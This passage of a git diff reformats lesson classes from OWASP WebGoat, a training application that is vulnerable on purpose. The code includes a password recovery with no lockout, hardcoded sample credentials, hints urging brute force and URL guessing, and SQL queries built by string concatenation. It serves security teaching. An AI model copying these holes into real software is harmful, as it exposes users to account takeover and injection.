+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.INSECURE_CONFIGURATION;
+	}
 
-    /**
-     *  Gets the category attribute of the ForgotPassword object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-    	return Category.INSECURE_CONFIGURATION;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the HelloScreen object
-     *
-     * @return    The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-    	List<String> hints = new ArrayList<String>();
+	/**
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
 		hints.add("Try to guess the URL for the config page");
 		hints.add("The config page is guessable and hackable");
 		hints.add("Play with the URL and try to guess what you can replace 'attack' with.");
 		hints.add("Try to navigate to http://localhost/WebGoat/conf");
 		return hints;
-    }
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(15);
+	private final static Integer DEFAULT_RANKING = new Integer(15);
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    protected Integer getDefaultRanking()
-    {
-    	return DEFAULT_RANKING;
-    }
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Forced Browsing");
+	}
 
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-    	return ("Forced Browsing");
-    }
-
-
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java
index 6d2bee5ca..c003e284a 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
 import java.util.HashMap;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -17,322 +17,319 @@ import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TH;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Eric Sheridan <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    December 18, 2005
+ * 
+ * @author Eric Sheridan <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created December 18, 2005
  */
 public class ForgotPassword extends LessonAdapter
 {
 
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-    private final static String USERNAME = "Username";
+	private final static String USERNAME = "Username";
 
-    private static String USERNAME_RESPONSE = "";
+	private static String USERNAME_RESPONSE = "";
 
-    private final static String COLOR = "Color";
+	private final static String COLOR = "Color";
 
-    private static String COLOR_RESPONSE = "";
+	private static String COLOR_RESPONSE = "";
 
-    private static int STAGE = 1;
+	private static int STAGE = 1;
 
-    private final static HashMap<String, String> USERS = new HashMap<String, String>();
+	private final static HashMap<String, String> USERS = new HashMap<String, String>();
 
-    private final static HashMap<String, String> COLORS = new HashMap<String, String>();
+	private final static HashMap<String, String> COLORS = new HashMap<String, String>();
 
-
-    private void populateTables()
-    {
+	private void populateTables()
+	{
 		USERS.put("admin", "2275$starBo0rn3");
 		USERS.put("jeff", "(_I_)illia(V)s");
 		USERS.put("dave", "\\V/ich3r$");
 		USERS.put("intern", "H3yn0w");
 		USERS.put("webgoat", "webgoat");
-	
+
 		COLORS.put("admin", "green");
 		COLORS.put("jeff", "orange");
 		COLORS.put("dave", "purple");
 		COLORS.put("intern", "yellow");
 		COLORS.put("webgoat", "red");
-    }
+	}
 
-
-    protected Element doStage1(WebSession s)
-    {
+	protected Element doStage1(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-	
+
 		ec.addElement(new BR().addElement(new H1().addElement("Webgoat Password Recovery ")));
 		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-	
+
 		if (s.isColor())
 		{
-		    t.setBorder(1);
+			t.setBorder(1);
 		}
-	
+
 		TR tr = new TR();
-		tr.addElement(new TH().addElement("Please input your username.  See the OWASP admin if you do not have an account.").setColSpan(2).setAlign("left"));
+		tr.addElement(new TH()
+				.addElement("Please input your username.  See the OWASP admin if you do not have an account.")
+				.setColSpan(2).setAlign("left"));
 		t.addElement(tr);
-	
+
 		tr = new TR();
 		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
 		t.addElement(tr);
-	
+
 		tr = new TR();
 		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
 		t.addElement(tr);
-	
+
 		TR row1 = new TR();
 		row1.addElement(new TD(new B(new StringElement("*User Name: "))));
-	
+
 		Input input1 = new Input(Input.TEXT, USERNAME, "");
 		row1.addElement(new TD(input1));
 		t.addElement(row1);
-	
+
 		Element b = ECSFactory.makeButton("Submit");
 		t.addElement(new TR(new TD(b)));
 		ec.addElement(t);
-	
+
 		return (ec);
-    }
+	}
 
-
-    protected Element doStage2(WebSession s)
-    {
+	protected Element doStage2(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-	
+
 		ec.addElement(new H1().addElement("Webgoat Password Recovery "));
 		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-	
+
 		if (s.isColor())
 		{
-		    t.setBorder(1);
+			t.setBorder(1);
 		}
-	
+
 		TR tr = new TR();
-		tr.addElement(new TH().addElement("Secret Question: What is your favorite color?").setColSpan(2).setAlign("left"));
+		tr.addElement(new TH().addElement("Secret Question: What is your favorite color?").setColSpan(2)
+				.setAlign("left"));
 		t.addElement(tr);
-	
+
 		tr = new TR();
 		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
 		t.addElement(tr);
-	
+
 		tr = new TR();
 		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
 		t.addElement(tr);
-	
+
 		TR row1 = new TR();
 		row1.addElement(new TD(new B(new StringElement("*Answer: "))));
-	
+
 		Input input1 = new Input(Input.TEXT, COLOR, "");
 		row1.addElement(new TD(input1));
 		t.addElement(row1);
-	
+
 		Element b = ECSFactory.makeButton("Submit");
 		t.addElement(new TR(new TD(b)));
 		ec.addElement(t);
-	
+
 		return (ec);
-    }
+	}
 
-
-    protected Element doStage3(WebSession s)
-    {
+	protected Element doStage3(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-	
+
 		ec.addElement(new H1().addElement("Webgoat Password Recovery "));
 		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-	
+
 		if (s.isColor())
 		{
-		    t.setBorder(1);
+			t.setBorder(1);
 		}
-	
+
 		TR tr = new TR();
-		tr.addElement(new TH().addElement("For security reasons, please change your password immediately.").setColSpan(2).setAlign("left"));
+		tr.addElement(new TH().addElement("For security reasons, please change your password immediately.")
+				.setColSpan(2).setAlign("left"));
 		t.addElement(tr);
-	
+
 		tr = new TR();
-		tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:")))).setAlign("left"));
+		tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:"))))
+				.setAlign("left"));
 		t.addElement(tr);
-	
+
 		tr = new TR();
 		tr.addElement(new TD().addElement(new StringElement("Username: " + USERNAME_RESPONSE)));
 		t.addElement(tr);
-	
+
 		tr = new TR();
 		tr.addElement(new TD().addElement(new StringElement("Color: " + COLOR_RESPONSE)));
 		t.addElement(tr);
-	
+
 		tr = new TR();
 		tr.addElement(new TD().addElement(new StringElement("Password: " + USERS.get(USERNAME_RESPONSE).toString())));
 		t.addElement(tr);
-	
+
 		ec.addElement(t);
-	
+
 		if (USERNAME_RESPONSE.equals("admin") && COLOR_RESPONSE.equals("green"))
 		{
-		    makeSuccess(s);
+			makeSuccess(s);
 		}
 		else if (!USERNAME_RESPONSE.equals("webgoat") && USERS.containsKey(USERNAME_RESPONSE))
 		{
-		    s.setMessage("Close. Now try to get the password of a privileged account.");
+			s.setMessage("Close. Now try to get the password of a privileged account.");
 		}
 		return ec;
-    }
+	}
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
 		String username = "";
 		String color = "";
-	
+
 		color = s.getParser().getStringParameter(COLOR, "");
-	
+
 		if (color.length() > 0)
-		    STAGE = 2;
+			STAGE = 2;
 		else
-		    STAGE = 1;
-	
+			STAGE = 1;
+
 		if (USERS.size() == 0)
 		{
-		    populateTables();
+			populateTables();
 		}
-	
+
 		if (STAGE == 2)
 		{
-		    color = s.getParser().getStringParameter(COLOR, "");
-	
-		    if (COLORS.get(USERNAME_RESPONSE).equals(color))
-		    {
+			color = s.getParser().getStringParameter(COLOR, "");
+
+			if (COLORS.get(USERNAME_RESPONSE).equals(color))
+			{
 				STAGE = 1;
 				COLOR_RESPONSE = color;
 				ec.addElement(doStage3(s));
-		    }
-		    else
-		    {
+			}
+			else
+			{
 				s.setMessage("Incorrect response for " + USERNAME_RESPONSE + ". Please try again!");
 				ec.addElement(doStage2(s));
-		    }
+			}
 		}
 		else if (STAGE == 1)
 		{
-		    username = s.getParser().getStringParameter(USERNAME, "");
-	
-		    if (USERS.containsKey(username))
-		    {
+			username = s.getParser().getStringParameter(USERNAME, "");
+
+			if (USERS.containsKey(username))
+			{
 				STAGE = 2;
 				USERNAME_RESPONSE = username;
 				ec.addElement(doStage2(s));
-		    }
-		    else
-		    {
+			}
+			else
+			{
 				if (username.length() > 0)
 				{
 					s.setMessage("Not a valid username. Please try again.");
 				}
 				ec.addElement(doStage1(s));
-		    }
+			}
 		}
 		else
 		{
-		    ec.addElement(doStage1(s));
-		    STAGE = 1;
+			ec.addElement(doStage1(s));
+			STAGE = 1;
 		}
-	
+
 		return ec;
-    }
+	}
 
+	/**
+	 * Gets the category attribute of the ForgotPassword object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
 
-    /**
-     *  Gets the category attribute of the ForgotPassword object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
+		return Category.AUTHENTICATION;
+	}
 
-	return Category.AUTHENTICATION;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the HelloScreen object
-     *
-     * @return    The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
+	/**
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s)
+	{
 		List<String> hints = new ArrayList<String>();
-		
+
 		hints.add("There is no lock out policy in place, brute force your way!");
 		hints.add("Try using usernames you might encounter throughout WebGoat.");
 		hints.add("There are only so many possible colors, can you guess one?");
 		hints.add("The administrative account is \"admin\"");
-	
+
 		return hints;
-    }
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(15);
+	private final static Integer DEFAULT_RANKING = new Integer(15);
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    protected Integer getDefaultRanking()
-    {
-    	return DEFAULT_RANKING;
-    }
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Forgot Password");
+	}
 
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-    	return ("Forgot Password");
-    }
-
-
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java
index 32b4a2e3f..2f82feda0 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java
@@ -1,42 +1,42 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
@@ -45,9 +45,9 @@ public abstract class DefaultLessonAction implements LessonAction
 	// FIXME: We could parse this class name to get defaults for these fields.
 	private String lessonName;
 	private String actionName;
-	
+
 	private GoatHillsFinancial lesson;
-	
+
 	public DefaultLessonAction(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
 		this.lesson = lesson;
@@ -55,8 +55,8 @@ public abstract class DefaultLessonAction implements LessonAction
 		this.actionName = actionName;
 	}
 
-	public void handleRequest( WebSession s )
-			throws ParameterNotFoundException, UnauthenticatedException, UnauthorizedException, ValidationException
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
 	{
 		getLesson().setCurrentAction(s, getActionName());
 
@@ -83,37 +83,34 @@ public abstract class DefaultLessonAction implements LessonAction
 	{
 		return actionName;
 	}
-	
+
 	public void setSessionAttribute(WebSession s, String name, Object value)
 	{
 		s.getRequest().getSession().setAttribute(name, value);
 	}
-	
+
 	public void setRequestAttribute(WebSession s, String name, Object value)
 	{
 		s.getRequest().setAttribute(name, value);
 	}
-	
+
 	public void removeSessionAttribute(WebSession s, String name)
 	{
-		s.getRequest().getSession().removeAttribute(name);		
+		s.getRequest().getSession().removeAttribute(name);
 	}
-	
+
 	protected String getSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
 	{
 		String value = (String) s.getRequest().getSession().getAttribute(name);
-		if (value == null)
-		{
-			throw new ParameterNotFoundException();
-		}
-		
+		if (value == null) { throw new ParameterNotFoundException(); }
+
 		return value;
 	}
-	
+
 	protected boolean getBooleanSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
 	{
 		boolean value = false;
-		
+
 		Object attribute = s.getRequest().getSession().getAttribute(name);
 		if (attribute == null)
 		{
@@ -121,13 +118,15 @@ public abstract class DefaultLessonAction implements LessonAction
 		}
 		else
 		{
-			//System.out.println("Attribute " + name + " is of type " + s.getRequest().getSession().getAttribute(name).getClass().getName());
-			//System.out.println("Attribute value: " + s.getRequest().getSession().getAttribute(name));
+			// System.out.println("Attribute " + name + " is of type " +
+			// s.getRequest().getSession().getAttribute(name).getClass().getName());
+			// System.out.println("Attribute value: " +
+			// s.getRequest().getSession().getAttribute(name));
 			value = ((Boolean) attribute).booleanValue();
 		}
 		return value;
 	}
-	
+
 	protected int getIntSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
 	{
 		int value = -1;
@@ -141,26 +140,22 @@ public abstract class DefaultLessonAction implements LessonAction
 			try
 			{
 				value = Integer.parseInt(ss);
-			}
-			catch (NumberFormatException nfe)
+			} catch (NumberFormatException nfe)
 			{
 			}
 		}
-		
+
 		return value;
 	}
-	
+
 	protected String getRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
 	{
 		String value = (String) s.getRequest().getAttribute(name);
-		if (value == null)
-		{
-			throw new ParameterNotFoundException();
-		}
-		
+		if (value == null) { throw new ParameterNotFoundException(); }
+
 		return value;
 	}
-	
+
 	protected int getIntRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
 	{
 		int value = -1;
@@ -174,153 +169,154 @@ public abstract class DefaultLessonAction implements LessonAction
 			try
 			{
 				value = Integer.parseInt(ss);
-			}
-			catch (NumberFormatException nfe)
+			} catch (NumberFormatException nfe)
 			{
 			}
 		}
-		
+
 		return value;
 	}
-	
+
 	public int getUserId(WebSession s) throws ParameterNotFoundException
 	{
 		return getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
 	}
-	
+
 	public String getUserName(WebSession s) throws ParameterNotFoundException
 	{
 		String name = null;
-		
+
 		int employeeId = getUserId(s);
 		try
 		{
 			String query = "SELECT first_name FROM employee WHERE userid = " + employeeId;
-			
+
 			try
 			{
-				Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
-				ResultSet answer_results = answer_statement.executeQuery( query );
-				if (answer_results.next())
-					name = answer_results.getString("first_name");
-			}
-			catch ( SQLException sqle )
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next()) name = answer_results.getString("first_name");
+			} catch (SQLException sqle)
 			{
-				s.setMessage( "Error getting user name" );
+				s.setMessage("Error getting user name");
 				sqle.printStackTrace();
 			}
-		}
-		catch ( Exception e )
+		} catch (Exception e)
 		{
-			s.setMessage( "Error getting user name" );
+			s.setMessage("Error getting user name");
 			e.printStackTrace();
 		}
 
 		return name;
 	}
-	
+
 	public boolean requiresAuthentication()
 	{
 		// Default to true
 		return true;
 	}
-	
+
 	public boolean isAuthenticated(WebSession s)
 	{
 		boolean authenticated = false;
-		
+
 		try
 		{
 			authenticated = getBooleanSessionAttribute(s, getLessonName() + ".isAuthenticated");
+		} catch (ParameterNotFoundException e)
+		{
 		}
-		catch (ParameterNotFoundException e)
-		{	
-		}
-		
+
 		return authenticated;
 	}
-	
+
 	public boolean isAuthorized(WebSession s, int employeeId, String functionId)
 	{
-		String employer_id = (String)s.getRequest().getSession().getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID);
-		//System.out.println("Authorizing " + employeeId + " for use of function: " + functionId + " having USER_ID = " + employer_id );
+		String employer_id = (String) s.getRequest().getSession()
+				.getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID);
+		// System.out.println("Authorizing " + employeeId + " for use of function: " + functionId +
+		// " having USER_ID = "
+		// + employer_id );
 		boolean authorized = false;
-		
+
 		try
 		{
-			String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = " + employeeId + ") and functionid = '" + functionId + "'";
-			
+			String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = "
+					+ employeeId + ") and functionid = '" + functionId + "'";
+
 			try
 			{
-				Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
-				ResultSet answer_results = answer_statement.executeQuery( query );
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
 				authorized = answer_results.first();
-				
-				/* User is validated for function, but can the user perform that function on the specified user? */
-				if(authorized)
+
+				/*
+				 * User is validated for function, but can the user perform that function on the
+				 * specified user?
+				 */
+				if (authorized)
 				{
 					authorized = isAuthorizedForEmployee(s, Integer.parseInt(employer_id), employeeId);
 				}
-			}
-			catch ( SQLException sqle )
+			} catch (SQLException sqle)
 			{
-				s.setMessage( "Error authorizing" );
+				s.setMessage("Error authorizing");
 				sqle.printStackTrace();
 			}
-		}
-		catch ( Exception e )
+		} catch (Exception e)
 		{
-			s.setMessage( "Error authorizing" );
+			s.setMessage("Error authorizing");
 			e.printStackTrace();
 		}
-				
-		//System.out.println("Authorized? " + authorized);
+
+		// System.out.println("Authorized? " + authorized);
 		return authorized;
 	}
-	
+
 	public boolean isAuthorizedForEmployee(WebSession s, int userId, int employeeId)
 	{
-		//System.out.println("Authorizing " + userId + " for access to employee: " + employeeId);
+		// System.out.println("Authorizing " + userId + " for access to employee: " + employeeId);
 		boolean authorized = false;
-		
+
 		try
 		{
 			String query = "SELECT * FROM ownership WHERE employer_id = ? AND employee_id = ?";
-			
+
 			try
 			{
-				
-				PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
-						ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
 				answer_statement.setInt(1, userId);
 				answer_statement.setInt(2, employeeId);
 				ResultSet answer_results = answer_statement.executeQuery();
 				authorized = answer_results.first();
-			}
-			catch ( SQLException sqle )
+			} catch (SQLException sqle)
 			{
-				s.setMessage( "Error authorizing" );
+				s.setMessage("Error authorizing");
 				sqle.printStackTrace();
 			}
-		}
-		catch ( Exception e )
+		} catch (Exception e)
 		{
-			s.setMessage( "Error authorizing" );
+			s.setMessage("Error authorizing");
 			e.printStackTrace();
 		}
-		
+
 		return authorized;
 	}
-	
+
 	protected void setStage(WebSession s, String stage)
 	{
 		getLesson().setStage(s, stage);
 	}
 
-	protected void setStageComplete(WebSession s, String stage) {
+	protected void setStageComplete(WebSession s, String stage)
+	{
 		getLesson().setStageComplete(s, stage);
 	}
-	
+
 	protected String getStage(WebSession s)
 	{
 		return getLesson().getStage(s);
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
index 67e8a8a2e..81799d83b 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
@@ -1,122 +1,111 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class DeleteProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-    public DeleteProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	int userId = getIntSessionAttribute(s, getLessonName() + "."
-		+ GoatHillsFinancial.USER_ID);
-	int employeeId = s.getParser().getIntParameter(
-		GoatHillsFinancial.EMPLOYEE_ID);
-
-	if (isAuthenticated(s))
+	public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    deleteEmployeeProfile(s, userId, employeeId);
-
-	    try
-	    {
-		chainedAction.handleRequest(s);
-	    }
-	    catch (UnauthenticatedException ue1)
-	    {
-		System.out.println("Internal server error");
-		ue1.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		System.out.println("Internal server error");
-		ue2.printStackTrace();
-	    }
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
 	}
-	else
-	    throw new UnauthenticatedException();
 
-    }
-
-    public String getNextPage(WebSession s)
-    {
-	return GoatHillsFinancial.LISTSTAFF_ACTION;
-    }
-
-    public void deleteEmployeeProfile(WebSession s, int userId, int employeeId)
-	    throws UnauthorizedException
-    {
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-	    String query = "DELETE FROM employee WHERE userid = " + employeeId;
-	    //System.out.println("Query:  " + query);
-	    try
-	    {
-		Statement statement = WebSession.getConnection(s)
